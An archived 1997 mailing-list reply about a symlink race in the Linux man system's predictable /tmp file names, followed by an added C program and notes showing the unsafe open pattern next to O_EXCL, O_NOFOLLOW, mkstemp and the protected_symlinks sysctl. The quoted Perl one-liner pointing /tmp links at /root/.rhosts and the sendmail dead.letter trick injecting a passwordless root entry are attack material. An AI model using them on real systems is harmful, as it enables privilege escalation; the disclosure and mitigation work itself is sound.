Date: 12/26/97 2:35:15 AM
From:
Subject: Re: man problem
To: (""@LOCAL)

On Wed, 24 Dec 1997, Thomas Fischbacher wrote:

> I just noticed a problem with the man system (version 2.3.10) on my Linux

I have man version 1.4j (from typing man -?) and it doesn't exhibit this
problem. It writes directly to /var/catman and doesn't use /tmp for anything.

> box: /usr/man contains the .gz'd man pages:
> When I execute man, a temporary file containing the un-zipped manpage is
> created in /tmp. The name of the tmp-file usually is "zman<pid>aaa",
> e.g. "zman10849aaa". This can be exploited with a simple symlink attack:
>
> perl -e 'for($i=8000;$i<12000;$i++){`ln -s /root/.rhosts /tmp/zman${i}aaa`;}'
>
> So when root executes man here and the pid of the man process falls in the
> range 8000-11999... you know the rest.

In general passive attacks like this can be used to overwrite arbitrary files
on the system by making symlinks if and only if root isn't paying attention to
what he is doing. I personally prefer the kernel patch which prevents users
from making symlinks to files which they don't own. It solves this and a host
of other symlink problems. I never yet found a reason not to do this.

A much more serious problem is the symlink attack with sendmail, wherein bad
guys can symlink /var/tmp/dead.letter to wherever they want and then cause
sendmail to write a dead letter into it, typically containing something like
'r00t::0:0:r00t:/root:/bin/bash' :)
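The root cause in both the man and the sendmail cases above is the same: a privileged program opens a predictable name in a world-writable directory with O_CREAT but without O_EXCL, so a pre-planted symlink is silently followed. The program below is an added example, not code from the thread or from the man or sendmail projects; it reproduces the failure mode against a victim file inside a scratch directory it creates itself, and shows the two fixes a program author controls: opening with O_CREAT|O_EXCL|O_NOFOLLOW (the kernel refuses with EEXIST when anything, a symlink included, already sits at the name) and letting mkstemp() pick an unpredictable name atomically. The name zman12345aaa and the scratch directory template are constructed for the demo.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Unsafe opener, modelled on the predictable /tmp/zman<pid>aaa pattern in the post:
 * O_CREAT without O_EXCL follows whatever symlink was planted at that name. */
int open_temp_unsafe(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
}

/* Safe opener: O_EXCL makes open() fail with EEXIST if any entry (symlink included)
 * already exists at the path; O_NOFOLLOW additionally refuses a trailing symlink. */
int open_temp_safe(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

struct demo_result {
    int unsafe_followed;   /* 1 if the unsafe open went through the planted link */
    int victim_clobbered;  /* 1 if the victim file's content was overwritten */
    int safe_refused;      /* 1 if the safe open returned -1 */
    int safe_errno;        /* errno from the safe open (EEXIST on Linux) */
    int mkstemp_ok;        /* 1 if mkstemp produced a fresh regular file */
};

/* Read a small file without following symlinks; returns byte count or -1. */
static int read_small(const char *path, char *buf, size_t len) {
    int fd = open(path, O_RDONLY | O_NOFOLLOW);
    if (fd < 0) return -1;
    ssize_t n = read(fd, buf, len - 1);
    close(fd);
    if (n < 0) return -1;
    buf[n] = '\0';
    return (int)n;
}

struct demo_result run_demo(void) {
    struct demo_result r = {0, 0, 0, 0, 0};
    char dir[64];  /* scratch directory, constructed for the demo */
    strcpy(dir, "/tmp/symlinkdemo.XXXXXX");
    if (mkdtemp(dir) == NULL) {
        strcpy(dir, "./symlinkdemo.XXXXXX");
        if (mkdtemp(dir) == NULL) return r;
    }

    char victim[256], link[256], tmpl[256], buf[64];
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(link, sizeof link, "%s/zman12345aaa", dir);  /* hypothetical predictable name */
    snprintf(tmpl, sizeof tmpl, "%s/zman.XXXXXX", dir);   /* mkstemp template */

    /* The file an attacker would want overwritten, with known content. */
    int fd = open(victim, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0) goto out;
    if (write(fd, "original", 8) != 8) { close(fd); goto out; }
    close(fd);

    /* Stand-in for the planted link: here it lives in our own scratch directory. */
    if (symlink(victim, link) != 0) goto out;

    /* 1. The unsafe open follows the link and truncates the victim. */
    fd = open_temp_unsafe(link);
    if (fd >= 0) {
        r.unsafe_followed = 1;
        if (write(fd, "clobbered", 9) != 9) r.unsafe_followed = 0;
        close(fd);
    }
    if (read_small(victim, buf, sizeof buf) >= 0 && strcmp(buf, "clobbered") == 0)
        r.victim_clobbered = 1;

    /* 2. The safe open refuses: O_EXCL treats the link as an existing entry. */
    fd = open_temp_safe(link);
    if (fd < 0) { r.safe_refused = 1; r.safe_errno = errno; } else close(fd);

    /* 3. mkstemp: atomic creation of an unpredictable name, never through a symlink. */
    fd = mkstemp(tmpl);
    if (fd >= 0) {
        struct stat st;
        if (lstat(tmpl, &st) == 0 && S_ISREG(st.st_mode) && strstr(tmpl, "XXXXXX") == NULL)
            r.mkstemp_ok = 1;
        close(fd);
        unlink(tmpl);
    }

out:
    unlink(link);
    unlink(victim);
    rmdir(dir);
    return r;
}

int main(void) {
    struct demo_result r = run_demo();
    printf("unsafe open followed link: %d, victim clobbered: %d\n",
           r.unsafe_followed, r.victim_clobbered);
    printf("safe open refused: %d (errno %d, EEXIST is %d)\n",
           r.safe_refused, r.safe_errno, EEXIST);
    printf("mkstemp produced a fresh regular file: %d\n", r.mkstemp_ok);
    return 0;
}
```

The kernel-side mitigation the reply favours exists in mainline Linux today as the fs.protected_symlinks sysctl: symlinks in world-writable sticky directories such as /tmp are only followed when the follower's uid matches the link owner or the directory owner. It is a safety net for programs that still use the unsafe pattern; the O_EXCL and mkstemp() forms above are the fix a program author should ship regardless.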